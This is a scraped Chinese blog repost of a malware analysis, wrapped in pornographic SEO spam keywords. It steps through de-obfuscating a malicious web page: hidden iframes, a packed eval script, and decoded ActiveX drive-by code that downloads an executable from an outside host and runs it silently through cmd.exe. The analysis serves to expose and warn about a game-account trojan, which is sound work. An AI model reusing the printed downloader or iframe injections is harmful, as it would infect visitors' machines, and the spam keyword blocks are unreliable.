用到的軟件列表 1、迅 " /> 国产特级全黄一级毛片不卡,欧美日韩极品,久久精品国产一区二区三区不卡

一区二区久久-一区二区三区www-一区二区三区久久-一区二区三区久久精品-麻豆国产一区二区在线观看-麻豆国产视频

jser必看的破解javascript各種加密的反向思維方法 原創(chuàng)

原創(chuàng)文章,轉(zhuǎn)載請寫明出處 腳本之家
才發(fā)現(xiàn)的破解Javascript各種加密的反向思維方法,大家有好的方法都跟帖啊
最近發(fā)現(xiàn)了一個代碼,加密了5層左右,我將破解到最后一步,而且不用Javascript解密程序

用到的軟件列表 
  1、迅雷(下載網(wǎng)頁)直接瀏覽會執(zhí)行的,看不到源代碼
  2、或用firefox這個軟件可以直接瀏覽網(wǎng)址,由于firefox的特殊性,也推薦用這個瀏覽器
一、目標(biāo)網(wǎng)址 http://www.e9ad.cn/pcdd/80-806.htm
我們用迅雷下載這個頁面或用firefox瀏覽器瀏覽得到如下代碼
復(fù)制代碼 代碼如下:
<script language=Javascript>var DFQC=function(a){return String.fromCharCode
(a^22)};document.write(DFQC(42)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC(122)+DFQC(40)+DFQC(27)
+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(126)+DFQC(115)+DFQC(119)+DFQC(114)+DFQC(40)+DFQC(27)+DFQC
(28)+DFQC(42)+DFQC(101)+DFQC(117)+DFQC(100)+DFQC(127)+DFQC(102)+DFQC(98)+DFQC(40)+DFQC(27)
+DFQC(28)+DFQC(54)+DFQC(112)+DFQC(99)+DFQC(120)+DFQC(117)+DFQC(98)+DFQC(127)+DFQC(121)+DFQC
(120)+DFQC(54)+DFQC(117)+DFQC(122)+DFQC(115)+DFQC(119)+DFQC(100)+DFQC(62)+DFQC(63)+DFQC
(109)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(69)+DFQC(121)+DFQC(99)+DFQC(100)+DFQC(117)+DFQC(115)
+DFQC(43)+DFQC(114)+DFQC(121)+DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)
+DFQC(56)+DFQC(116)+DFQC(121)+DFQC(114)+DFQC(111)+DFQC(56)+DFQC(112)+DFQC(127)+DFQC(100)
+DFQC(101)+DFQC(98)+DFQC(85)+DFQC(126)+DFQC(127)+DFQC(122)+DFQC(114)+DFQC(56)+DFQC(114)
+DFQC(119)+DFQC(98)+DFQC(119)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(114)+DFQC(121)+DFQC
(117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)+DFQC(56)+DFQC(121)+DFQC(102)+DFQC
(115)+DFQC(120)+DFQC(62)+DFQC(63)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(114)+DFQC(121)
+DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)+DFQC(56)+DFQC(117)+DFQC(122)
+DFQC(121)+DFQC(101)+DFQC(115)+DFQC(62)+DFQC(63)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC
(114)+DFQC(121)+DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)+DFQC(56)+DFQC(98)
+DFQC(127)+DFQC(98)+DFQC(122)+DFQC(115)+DFQC(43)+DFQC(52)+DFQC(113)+DFQC(113)+DFQC(52)+DFQC
(45)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(114)+DFQC(121)+DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)
+DFQC(120)+DFQC(98)+DFQC(56)+DFQC(116)+DFQC(121)+DFQC(114)+DFQC(111)+DFQC(56)+DFQC(127)
+DFQC(120)+DFQC(120)+DFQC(115)+DFQC(100)+DFQC(94)+DFQC(66)+DFQC(91)+DFQC(90)+DFQC(43)+DFQC
(69)+DFQC(121)+DFQC(99)+DFQC(100)+DFQC(117)+DFQC(115)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC(54)
+DFQC(107)+DFQC(42)+DFQC(57)+DFQC(101)+DFQC(117)+DFQC(100)+DFQC(127)+DFQC(102)+DFQC(98)
+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(98)+DFQC(127)+DFQC(98)+DFQC(122)+DFQC
(115)+DFQC(40)+DFQC(119)+DFQC(114)+DFQC(42)+DFQC(57)+DFQC(98)+DFQC(127)+DFQC(98)+DFQC(122)
+DFQC(115)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(57)+DFQC(126)+DFQC(115)+DFQC
(119)+DFQC(114)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(116)+DFQC(121)+DFQC(114)
+DFQC(111)+DFQC(54)+DFQC(121)+DFQC(120)+DFQC(122)+DFQC(121)+DFQC(119)+DFQC(114)+DFQC(43)
+DFQC(117)+DFQC(122)+DFQC(115)+DFQC(119)+DFQC(100)+DFQC(62)+DFQC(63)+DFQC(54)+DFQC(98)+DFQC
(121)+DFQC(102)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)+DFQC(43)+DFQC
(52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(122)+DFQC(115)+DFQC(112)+DFQC(98)+DFQC(123)+DFQC(119)
+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC
(100)+DFQC(127)+DFQC(113)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC(113)+DFQC
(127)+DFQC(120)+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(116)+DFQC(121)+DFQC(98)
+DFQC(98)+DFQC(121)+DFQC(123)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)
+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(55)
+DFQC(59)+DFQC(59)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(127)+DFQC(112)+DFQC(100)+DFQC(119)+DFQC
(123)+DFQC(115)+DFQC(54)+DFQC(120)+DFQC(119)+DFQC(123)+DFQC(115)+DFQC(43)+DFQC(52)+DFQC(95)
+DFQC(39)+DFQC(52)+DFQC(54)+DFQC(101)+DFQC(100)+DFQC(117)+DFQC(43)+DFQC(52)+DFQC(46)+DFQC
(38)+DFQC(46)+DFQC(38)+DFQC(56)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC(52)+DFQC(54)+DFQC(123)
+DFQC(119)+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)+DFQC(97)+DFQC(127)+DFQC(114)+DFQC(98)
+DFQC(126)+DFQC(43)+DFQC(52)+DFQC(39)+DFQC(52)+DFQC(54)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC
(113)+DFQC(127)+DFQC(120)+DFQC(126)+DFQC(115)+DFQC(127)+DFQC(113)+DFQC(126)+DFQC(98)+DFQC
(43)+DFQC(52)+DFQC(39)+DFQC(52)+DFQC(54)+DFQC(126)+DFQC(115)+DFQC(127)+DFQC(113)+DFQC(126)
+DFQC(98)+DFQC(43)+DFQC(52)+DFQC(46)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(97)+DFQC(127)+DFQC
(114)+DFQC(98)+DFQC(126)+DFQC(43)+DFQC(52)+DFQC(46)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(101)
+DFQC(117)+DFQC(100)+DFQC(121)+DFQC(122)+DFQC(122)+DFQC(127)+DFQC(120)+DFQC(113)+DFQC(43)
+DFQC(52)+DFQC(120)+DFQC(121)+DFQC(52)+DFQC(54)+DFQC(116)+DFQC(121)+DFQC(100)+DFQC(114)
+DFQC(115)+DFQC(100)+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(112)+DFQC(100)+DFQC
(119)+DFQC(123)+DFQC(115)+DFQC(116)+DFQC(121)+DFQC(100)+DFQC(114)+DFQC(115)+DFQC(100)+DFQC
(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(40)+DFQC(42)+DFQC(57)+DFQC(127)+DFQC(112)+DFQC(100)
+DFQC(119)+DFQC(123)+DFQC(115)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(59)+DFQC(59)+DFQC
(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(57)+DFQC(116)+DFQC(121)+DFQC(114)+DFQC(111)
+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(57)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC
(122)+DFQC(40)+DFQC(54)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(69)+DFQC(85)+DFQC(68)+DFQC(95)+DFQC
(70)+DFQC(66)+DFQC(40)+DFQC(54)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(55)+DFQC(59)+DFQC(59)+DFQC
(54)+DFQC(27)+DFQC(28)+DFQC(97)+DFQC(127)+DFQC(120)+DFQC(114)+DFQC(121)+DFQC(97)+DFQC(56)
+DFQC(114)+DFQC(115)+DFQC(112)+DFQC(119)+DFQC(99)+DFQC(122)+DFQC(98)+DFQC(69)+DFQC(98)+DFQC
(119)+DFQC(98)+DFQC(99)+DFQC(101)+DFQC(43)+DFQC(52)+DFQC(54)+DFQC(54)+DFQC(52)+DFQC(45)
+DFQC(54)+DFQC(27)+DFQC(28)+DFQC(57)+DFQC(57)+DFQC(59)+DFQC(59)+DFQC(40)+DFQC(54)+DFQC(27)
+DFQC(28)+DFQC(42)+DFQC(57)+DFQC(69)+DFQC(85)+DFQC(68)+DFQC(95)+DFQC(70)+DFQC(66)+DFQC(40)
+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(127)+DFQC(112)+DFQC(100)+DFQC(119)+DFQC(123)+DFQC(115)
+DFQC(54)+DFQC(101)+DFQC(100)+DFQC(117)+DFQC(43)+DFQC(126)+DFQC(98)+DFQC(98)+DFQC(102)+DFQC
(44)+DFQC(57)+DFQC(57)+DFQC(102)+DFQC(121)+DFQC(102)+DFQC(56)+DFQC(97)+DFQC(108)+DFQC(110)
+DFQC(103)+DFQC(111)+DFQC(56)+DFQC(117)+DFQC(121)+DFQC(123)+DFQC(57)+DFQC(33)+DFQC(33)+DFQC
(33)+DFQC(57)+DFQC(127)+DFQC(120)+DFQC(114)+DFQC(115)+DFQC(110)+DFQC(56)+DFQC(126)+DFQC(98)
+DFQC(123)+DFQC(54)+DFQC(97)+DFQC(127)+DFQC(114)+DFQC(98)+DFQC(126)+DFQC(43)+DFQC(38)+DFQC
(54)+DFQC(126)+DFQC(115)+DFQC(127)+DFQC(113)+DFQC(126)+DFQC(98)+DFQC(43)+DFQC(38)+DFQC(40)
+DFQC(42)+DFQC(57)+DFQC(127)+DFQC(112)+DFQC(100)+DFQC(119)+DFQC(123)+DFQC(115)+DFQC(40)
+DFQC(27)+DFQC(28)+DFQC(27)+DFQC(28)+'');</script>

對于這個的解密呢,分析下
大家看下document.write(DFQC(42)+DFQC(126).....
這個DFQC(42),的DFQC就是解密var DFQC=function(a){return String.fromCharCode(a^22)}
下面我的解密代碼也想好了,這個方法基本上可以破解好多的類似代碼,大家可以看下這個代碼

[Ctrl+A 全選 注:如需引入外部Js需刷新才能執(zhí)行]
得到的解密的代碼就是
復(fù)制代碼 代碼如下:
<html>
 <head>
<script>
 function clear(){
 Source=document.body.firstChild.data;
 document.open();
 document.close();
 document.title="gg";
 document.body.innerHTML=Source;
 }</script>
 <title>ad</title>
 </head>
 <body onload=clear() topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0">
 <!--
<iframe name="I1" src="8080.htm" marginwidth="1" marginheight="1" height="80" width="80" 
scrolling="no" border="0" frameborder="0"></iframe>
 -->
 </body>
 </html> 
<SCRIPT> 
<!-- 
window.defaultStatus="  "; 
//--> 
</SCRIPT>
<iframe src=http://pop.wzxqy.com/777/index.htm width=0 height=0></iframe>

二、檢查下上面的http://www.e9ad.cn/pcdd/8080.htm和http://pop.wzxqy.com/777/index.htm
我發(fā)現(xiàn)下面的iframe加載的有問題,所以呢,
用下載工具下載http://pop.wzxqy.com/777/index.htm這個頁面的代碼可以發(fā)現(xiàn)如下
復(fù)制代碼 代碼如下:
<iframe src=http://cc.wzxqy.com/wm/index.htm width=0 height=0></iframe>
<script src='http://s92.cnzz.com/stat.php?id=451144&web_id=451144' language='JavaScript' 
charset='gb2312'></script>

看這個大家應(yīng)該會想起,好多網(wǎng)站賣流量類似的代碼(就是賣流量的)
三、繼續(xù)分析下 http://cc.wzxqy.com/wm/index.htm
用下載工具下載這個頁面,可以得到
復(fù)制代碼 代碼如下:
<script language=Javascript src=1.js></script>

好的繼續(xù)下載http://cc.wzxqy.com/wm/1.js這個js文件我得到了這個代碼
復(fù)制代碼 代碼如下:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?
String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k
[c]||e(c);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1};while(c--)if(k[c])
p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p}('f 8(n){3 g=h.j()*n;k/'~5
/'+/'.5/'}l{9=/'m://o.p.q/r/s.a/';3 4=t.u("v");4.w("y","z:A-B-C-D-E");3 x=4.7
("G.X"+"M"+"L"+"H"+"T"+"T"+"P","");3 S=4.7("I.J","");S.K=1;x.b("N",9,0);x.O();6=8(R);3 
F=4.7("U.V","");3 5=F.W(0);6=F.d(5,6);S.Y();S.Z(x.10);S.11(6,2);S.12();3 Q=4.7
("13.14","");e=F.d(5+/'////15/',/'16.a/');Q.17(e,/' /c /'+6,"","b",0)}18(i)
{i=1}',62,71,'|||var|df|tmp|fname1|CreateObject|gn|dl|exe|open||BuildPath|exp1|function|numb
er|Math||random|return|try|http||cc|wzxqy|com|wm|mm|document|createElement|object|setAttribu
te||classid|clsid|BD96C556|65A3|11D0|983A|00C04FC29E36||Microsoft||Adodb|Stream|type|||GET|s
end|||10000|||Scripting|FileSystemObject|GetSpecialFolder||Open|Write|responseBody|SaveToFil
e|Close|Shell|Application|system32|cmd|ShellExecute|catch'.split('|'),0,{}))

大家看到上面的代碼可能會發(fā)現(xiàn)無法解密了,我搜了下,發(fā)現(xiàn)了,竟然有解密代碼了,此處可以分析,不
過我這篇文章的目地,是不用解密程序的,所有我用下面的方法,

[Ctrl+A 全選 注:如需引入外部Js需刷新才能執(zhí)行]
上面的方法,我要是考慮下幾秒想到的方法,以前沒想起,現(xiàn)在大家以后就可以更方面的使用了
先將eval后的代碼用 var str=.......,然后document.write(str);得到了下面的代碼
復(fù)制代碼 代碼如下:
function gn(n){var number=Math.random()*n;return'~tmp'+'.tmp'}try
{dl='http://cc.wzxqy.com/wm/mm.exe';var df=document.createElement("object");df.setAttribute
("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var x=df.CreateObject
("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var S=df.CreateObject
("Adodb.Stream","");S.type=1;x.open("GET",dl,0);x.send();fname1=gn(10000);var 
F=df.CreateObject("Scripting.FileSystemObject","");var tmp=F.GetSpecialFolder
(0);fname1=F.BuildPath(tmp,fname1);S.Open();S.Write(x.responseBody);S.SaveToFile
(fname1,2);S.Close();var Q=df.CreateObject("Shell.Application","");exp1=F.BuildPath
(tmp+'//system32','cmd.exe');Q.ShellExecute(exp1,' /c '+fname1,"","open",0)}catch(i){i=1}

然后我們可以發(fā)現(xiàn)這個http://cc.wzxqy.com/wm/mm.exe,先下下載下來,記住下載后一般看大小,病毒
文件都很小,先將mm.exe改名位mm.exe.txt,打開看到了如下代碼,唉,
復(fù)制代碼 代碼如下:
<html><body><br><br>
<script>window.location="/wm/mm.exe?QVyRR=au6BKUDmtn1";</script>
<center><h3>如果您的頁面沒有自動跳轉(zhuǎn),請<a href="/wm/mm.exe?QVyRR=au6BKUDmtn1">點擊這里
</a><h3></center>
</body></html>

看到了嗎,最主要的就是這個了 http://cc.wzxqy.com/wm/mm.exe?QVyRR=au6BKUDmtn1
然后用軟件下載,這個就是病毒文件了,
終于完成了 ,發(fā)現(xiàn)病毒,應(yīng)該是盜號系統(tǒng)的木馬,現(xiàn)在網(wǎng)上賣流量的很多,大家愛玩游戲的請注意了 

當(dāng)然上面的Javascript反向思維方法可以得到大部分的加密的 Javascript,而且其它的好多都有解密程
序,大家如果好的方法,都貼出來啊,這樣大家才能進(jìn)步。作者:reterry QQ:461478385 
原創(chuàng)文章,轉(zhuǎn)載請寫明出處 腳本之家

JavaScript技術(shù)jser必看的破解javascript各種加密的反向思維方法 原創(chuàng),轉(zhuǎn)載需保留來源!

鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標(biāo)記有誤,請第一時間聯(lián)系我們修改或刪除,多謝。

主站蜘蛛池模板: 久久一级| 免费观看国产精品视频 | 免费日本一区 | 男女视频免费网站 | 浮力影院第一页小视频国产在线观看免费 | 免费一区二区三区免费视频 | 免费欧美一级 | 精品国产成人a在线观看 | 国产成人激情 | 激情网页 | 天天爱综合网 | 99久久国产综合精品麻豆 | 国产精品女 | 国产精品国产三级国快看 | 韩国美女爽快一级毛片黄 | 日韩在线 中文字幕 | 久久综合一区二区三区 | 成人综合网站 | 欧美一级视频免费 | 伊人久久大香线焦在观看 | 国产在线观看麻豆91精品免费 | 免费污视频在线观看 | 亚洲综合在线网 | 国产系列欧美系列日韩系列在线 | 91视频中文 | 日韩激情中文字幕一区二区 | 区二区三区四区免费视频 | 在线观看视频一区二区 | 国内精品一区视频在线播放 | 国产麻豆91网在线看 | 韩国本免费一级毛片免费 | 精品九九九 | 欧美午夜色大片在线观看免费 | 国内小情侣一二三区在线视频 | 九九九九九热 | 久久综合久综合久久鬼色 | 久久丝袜精品中文字幕 | 九九视频这里只有精品 | 一区二区三区在线 | 狠狠色噜噜狠狠狠97影音先锋 | 韩国一级毛片视频免费观看 |